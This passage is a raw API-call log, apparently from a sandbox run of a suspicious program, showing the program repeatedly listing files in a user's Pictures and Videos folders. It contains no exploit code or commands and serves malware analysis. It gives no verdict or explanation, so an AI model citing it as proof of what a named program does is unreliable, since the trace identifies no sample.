ftCreationTime.dwLowDateTime=0xb36b4ba0, ftCreationTime.dwHighDateTime=0x1d89c5b, ftLastAccessTime.dwLowDateTime=0xc1d0b590, ftLastAccessTime.dwHighDateTime=0x1d8a471, ftLastWriteTime.dwLowDateTime=0xc1d0b590, ftLastWriteTime.dwHighDateTime=0x1d8a471, nFileSizeHigh=0x0, nFileSizeLow=0x27b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jZE7XRus.m4a", cAlternateFileName="")) returned 1 [0185.056] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb57ff040, ftCreationTime.dwHighDateTime=0x1d8a3ad, ftLastAccessTime.dwLowDateTime=0x7c2b57f0, ftLastAccessTime.dwHighDateTime=0x1d8a4b9, ftLastWriteTime.dwLowDateTime=0x7c2b57f0, ftLastWriteTime.dwHighDateTime=0x1d8a4b9, nFileSizeHigh=0x0, nFileSizeLow=0x93c5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o2CgGnJETcQ5zceImOM_.m4a", cAlternateFileName="O2CGGN~1.M4A")) returned 1 [0185.056] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8dc130, ftCreationTime.dwHighDateTime=0x1d89eb8, ftLastAccessTime.dwLowDateTime=0xfe39f390, ftLastAccessTime.dwHighDateTime=0x1d8a668, ftLastWriteTime.dwLowDateTime=0xfe39f390, ftLastWriteTime.dwHighDateTime=0x1d8a668, nFileSizeHigh=0x0, nFileSizeLow=0x16b28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xXLI1eQxvUp5i 0hs6G.mp3", cAlternateFileName="XXLI1E~1.MP3")) returned 1 [0185.056] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72f75c0, ftCreationTime.dwHighDateTime=0x1d89f38, ftLastAccessTime.dwLowDateTime=0xd5a9abf0, ftLastAccessTime.dwHighDateTime=0x1d8a064, ftLastWriteTime.dwLowDateTime=0xd5a9abf0, ftLastWriteTime.dwHighDateTime=0x1d8a064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fBV4xgh8cLcTD- y4", cAlternateFileName="_FBV4X~1")) returned 1 [0185.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0185.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2e95af8 [0185.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0185.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4860 [0185.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0185.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0185.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.057] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa72f75c0, ftCreationTime.dwHighDateTime=0x1d89f38, ftLastAccessTime.dwLowDateTime=0xd5a9abf0, ftLastAccessTime.dwHighDateTime=0x1d8a064, ftLastWriteTime.dwLowDateTime=0xd5a9abf0, ftLastWriteTime.dwHighDateTime=0x1d8a064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fBV4xgh8cLcTD- y4", cAlternateFileName="_FBV4X~1")) returned 0 [0185.057] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.058] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2e95af8 [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.058] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\") returned="KiR-tAs9lgdEh FXubwY\\" [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.058] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0185.058] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.058] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.058] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.058] PathFindFileNameW (pszPath="") returned="" [0185.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2e95af8 [0185.058] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fafd10, ftCreationTime.dwHighDateTime=0x1d8a6d3, ftLastAccessTime.dwLowDateTime=0x5c1aec20, ftLastAccessTime.dwHighDateTime=0x1d8a6fb, ftLastWriteTime.dwLowDateTime=0x5c1aec20, ftLastWriteTime.dwHighDateTime=0x1d8a6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fafd10, ftCreationTime.dwHighDateTime=0x1d8a6d3, ftLastAccessTime.dwLowDateTime=0x5c1aec20, ftLastAccessTime.dwHighDateTime=0x1d8a6fb, ftLastWriteTime.dwLowDateTime=0x5c1aec20, ftLastWriteTime.dwHighDateTime=0x1d8a6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8eef660, ftCreationTime.dwHighDateTime=0x1d89717, ftLastAccessTime.dwLowDateTime=0x92b060c0, ftLastAccessTime.dwHighDateTime=0x1d89af4, ftLastWriteTime.dwLowDateTime=0x92b060c0, ftLastWriteTime.dwHighDateTime=0x1d89af4, nFileSizeHigh=0x0, nFileSizeLow=0x149e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-F78Z7ifiP0.png", cAlternateFileName="-F78Z7~1.PNG")) returned 1 [0185.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43756270, ftCreationTime.dwHighDateTime=0x1d8a3c9, ftLastAccessTime.dwLowDateTime=0x51bc0710, ftLastAccessTime.dwHighDateTime=0x1d8a50b, ftLastWriteTime.dwLowDateTime=0x51bc0710, ftLastWriteTime.dwHighDateTime=0x1d8a50b, nFileSizeHigh=0x0, nFileSizeLow=0xed92, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5qVH55h.bmp", cAlternateFileName="")) returned 1 [0185.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b48400, ftCreationTime.dwHighDateTime=0x1d8a701, ftLastAccessTime.dwLowDateTime=0x123ccd0, ftLastAccessTime.dwHighDateTime=0x1d8a708, ftLastWriteTime.dwLowDateTime=0x123ccd0, ftLastWriteTime.dwHighDateTime=0x1d8a708, nFileSizeHigh=0x0, nFileSizeLow=0x10a41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9OGpykt3_l8cM2Jx4cn.jpg", cAlternateFileName="9OGPYK~1.JPG")) returned 1 [0185.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2465a110, ftCreationTime.dwHighDateTime=0x1d89852, ftLastAccessTime.dwLowDateTime=0x744db970, ftLastAccessTime.dwHighDateTime=0x1d8a26f, ftLastWriteTime.dwLowDateTime=0x744db970, ftLastWriteTime.dwHighDateTime=0x1d8a26f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iIfMhH", cAlternateFileName="")) returned 1 [0185.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2e95af8 [0185.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6eb88 [0185.061] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9825c4f0, ftCreationTime.dwHighDateTime=0x1d89fc7, ftLastAccessTime.dwLowDateTime=0x92e76220, ftLastAccessTime.dwHighDateTime=0x1d8a08d, ftLastWriteTime.dwLowDateTime=0x92e76220, ftLastWriteTime.dwHighDateTime=0x1d8a08d, nFileSizeHigh=0x0, nFileSizeLow=0xa0cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v97V_KMwmgn4h6UDx.jpg", cAlternateFileName="V97V_K~1.JPG")) returned 1 [0185.062] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2b709b0, ftCreationTime.dwHighDateTime=0x1d8a613, ftLastAccessTime.dwLowDateTime=0x4660df40, ftLastAccessTime.dwHighDateTime=0x1d8a65e, ftLastWriteTime.dwLowDateTime=0x4660df40, ftLastWriteTime.dwHighDateTime=0x1d8a65e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yDPh4CpXgP3QwyUC", cAlternateFileName="YDPH4C~1")) returned 1 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e918d8 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2e95af8 [0185.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0185.062] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf929b0, ftCreationTime.dwHighDateTime=0x1d8a73b, ftLastAccessTime.dwLowDateTime=0xcef659b0, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xcef659b0, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0xf6d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yOmL -Z4 9fyb2IF7S9.png", cAlternateFileName="YOML-Z~1.PNG")) returned 1 [0185.062] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf929b0, ftCreationTime.dwHighDateTime=0x1d8a73b, ftLastAccessTime.dwLowDateTime=0xcef659b0, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xcef659b0, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0xf6d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yOmL -Z4 9fyb2IF7S9.png", cAlternateFileName="YOML-Z~1.PNG")) returned 0 [0185.062] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.063] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0185.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.063] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\") returned="kyMAgs7f-4q1mza r\\" [0185.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.063] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0185.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0185.063] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.064] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.064] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.064] PathFindFileNameW (pszPath="") returned="" [0185.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0185.064] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeebecf0, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x5adc3a10, ftLastAccessTime.dwHighDateTime=0x1d8a518, ftLastWriteTime.dwLowDateTime=0x5adc3a10, ftLastWriteTime.dwHighDateTime=0x1d8a518, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.066] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeebecf0, ftCreationTime.dwHighDateTime=0x1d89798, ftLastAccessTime.dwLowDateTime=0x5adc3a10, ftLastAccessTime.dwHighDateTime=0x1d8a518, ftLastWriteTime.dwLowDateTime=0x5adc3a10, ftLastWriteTime.dwHighDateTime=0x1d8a518, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.066] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc59090, ftCreationTime.dwHighDateTime=0x1d89b4d, ftLastAccessTime.dwLowDateTime=0x9d4afd50, ftLastAccessTime.dwHighDateTime=0x1d8a2d9, ftLastWriteTime.dwLowDateTime=0x9d4afd50, ftLastWriteTime.dwHighDateTime=0x1d8a2d9, nFileSizeHigh=0x0, nFileSizeLow=0x7b2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2j2l02AsmvpG-FW9.gif", cAlternateFileName="2J2L02~1.GIF")) returned 1 [0185.066] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bc92180, ftCreationTime.dwHighDateTime=0x1d8a0c6, ftLastAccessTime.dwLowDateTime=0xbfa06ba0, ftLastAccessTime.dwHighDateTime=0x1d8a730, ftLastWriteTime.dwLowDateTime=0xbfa06ba0, ftLastWriteTime.dwHighDateTime=0x1d8a730, nFileSizeHigh=0x0, nFileSizeLow=0x163bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Wfuj5RqE1i.gif", cAlternateFileName="7WFUJ5~1.GIF")) returned 1 [0185.066] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dddff60, ftCreationTime.dwHighDateTime=0x1d8a072, ftLastAccessTime.dwLowDateTime=0x9475ec90, ftLastAccessTime.dwHighDateTime=0x1d8a35a, ftLastWriteTime.dwLowDateTime=0x9475ec90, ftLastWriteTime.dwHighDateTime=0x1d8a35a, nFileSizeHigh=0x0, nFileSizeLow=0x676b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ae6i4Hslrl.png", cAlternateFileName="AE6I4H~1.PNG")) returned 1 [0185.066] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b5df2f0, ftCreationTime.dwHighDateTime=0x1d8a59c, ftLastAccessTime.dwLowDateTime=0x22722d0, ftLastAccessTime.dwHighDateTime=0x1d8a5e6, ftLastWriteTime.dwLowDateTime=0x22722d0, ftLastWriteTime.dwHighDateTime=0x1d8a5e6, nFileSizeHigh=0x0, nFileSizeLow=0xf0d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dTf66.png", cAlternateFileName="")) returned 1 [0185.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a9074a0, ftCreationTime.dwHighDateTime=0x1d89790, ftLastAccessTime.dwLowDateTime=0x13ba3060, ftLastAccessTime.dwHighDateTime=0x1d89cc1, ftLastWriteTime.dwLowDateTime=0x13ba3060, ftLastWriteTime.dwHighDateTime=0x1d89cc1, nFileSizeHigh=0x0, nFileSizeLow=0x12a2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k_XON6PdpszzEOE.bmp", cAlternateFileName="K_XON6~1.BMP")) returned 1 [0185.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cc7070, ftCreationTime.dwHighDateTime=0x1d89f90, ftLastAccessTime.dwLowDateTime=0xfc7f6830, ftLastAccessTime.dwHighDateTime=0x1d8a10b, ftLastWriteTime.dwLowDateTime=0xfc7f6830, ftLastWriteTime.dwHighDateTime=0x1d8a10b, nFileSizeHigh=0x0, nFileSizeLow=0xbf0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LXhmd.gif", cAlternateFileName="")) returned 1 [0185.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7320b0, ftCreationTime.dwHighDateTime=0x1d896e2, ftLastAccessTime.dwLowDateTime=0x89334340, ftLastAccessTime.dwHighDateTime=0x1d89db1, ftLastWriteTime.dwLowDateTime=0x89334340, ftLastWriteTime.dwHighDateTime=0x1d89db1, nFileSizeHigh=0x0, nFileSizeLow=0x7f38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uo7bfSHfyn-0X-MGd.bmp", cAlternateFileName="UO7BFS~1.BMP")) returned 1 [0185.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713be870, ftCreationTime.dwHighDateTime=0x1d897a1, ftLastAccessTime.dwLowDateTime=0x7c52a6f0, ftLastAccessTime.dwHighDateTime=0x1d89840, ftLastWriteTime.dwLowDateTime=0x7c52a6f0, ftLastWriteTime.dwHighDateTime=0x1d89840, nFileSizeHigh=0x0, nFileSizeLow=0x2998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YdXrJd.png", cAlternateFileName="")) returned 1 [0185.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713be870, ftCreationTime.dwHighDateTime=0x1d897a1, ftLastAccessTime.dwLowDateTime=0x7c52a6f0, ftLastAccessTime.dwHighDateTime=0x1d89840, ftLastWriteTime.dwLowDateTime=0x7c52a6f0, ftLastWriteTime.dwHighDateTime=0x1d89840, nFileSizeHigh=0x0, nFileSizeLow=0x2998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YdXrJd.png", cAlternateFileName="")) returned 0 [0185.067] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.068] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaef8 [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.068] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\") returned="z2E0zT\\" [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.068] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.068] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0185.068] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.068] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.068] PathFindFileNameW (pszPath="") returned="" [0185.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaef8 [0185.068] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4078e50, ftCreationTime.dwHighDateTime=0x1d89b53, ftLastAccessTime.dwLowDateTime=0xec5e4820, ftLastAccessTime.dwHighDateTime=0x1d8a4b4, ftLastWriteTime.dwLowDateTime=0xec5e4820, ftLastWriteTime.dwHighDateTime=0x1d8a4b4, nFileSizeHigh=0x0, nFileSizeLow=0x15e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g5znGT5HlbHq.mkv", cAlternateFileName="G5ZNGT~1.MKV")) returned 1 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd3396a0, ftCreationTime.dwHighDateTime=0x1d89e44, ftLastAccessTime.dwLowDateTime=0xcb34200, ftLastAccessTime.dwHighDateTime=0x1d8a1fa, ftLastWriteTime.dwLowDateTime=0xcb34200, ftLastWriteTime.dwHighDateTime=0x1d8a1fa, nFileSizeHigh=0x0, nFileSizeLow=0x1259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kYxGt6chL81vzY.avi", cAlternateFileName="KYXGT6~1.AVI")) returned 1 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a1f100, ftCreationTime.dwHighDateTime=0x1d89c02, ftLastAccessTime.dwLowDateTime=0xda201820, ftLastAccessTime.dwHighDateTime=0x1d89fd0, ftLastWriteTime.dwLowDateTime=0xda201820, ftLastWriteTime.dwHighDateTime=0x1d89fd0, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OH6QpPTsq5hUEw3V98y.swf", cAlternateFileName="OH6QPP~1.SWF")) returned 1 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4763a660, ftCreationTime.dwHighDateTime=0x1d8a286, ftLastAccessTime.dwLowDateTime=0x72147ed0, ftLastAccessTime.dwHighDateTime=0x1d8a6ef, ftLastWriteTime.dwLowDateTime=0x72147ed0, ftLastWriteTime.dwHighDateTime=0x1d8a6ef, nFileSizeHigh=0x0, nFileSizeLow=0x14102, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ufb ajK.mkv", cAlternateFileName="UFBAJK~1.MKV")) returned 1 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41c50b10, ftCreationTime.dwHighDateTime=0x1d89c0d, ftLastAccessTime.dwLowDateTime=0x59db12e0, ftLastAccessTime.dwHighDateTime=0x1d89cb6, ftLastWriteTime.dwLowDateTime=0x59db12e0, ftLastWriteTime.dwHighDateTime=0x1d89cb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vtiS4AAZ_oK", cAlternateFileName="VTIS4A~1")) returned 1 [0185.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4860 [0185.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0185.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb47f8 [0185.071] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd938fc0, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x34fdb060, ftLastAccessTime.dwHighDateTime=0x1d8a303, ftLastWriteTime.dwLowDateTime=0x34fdb060, 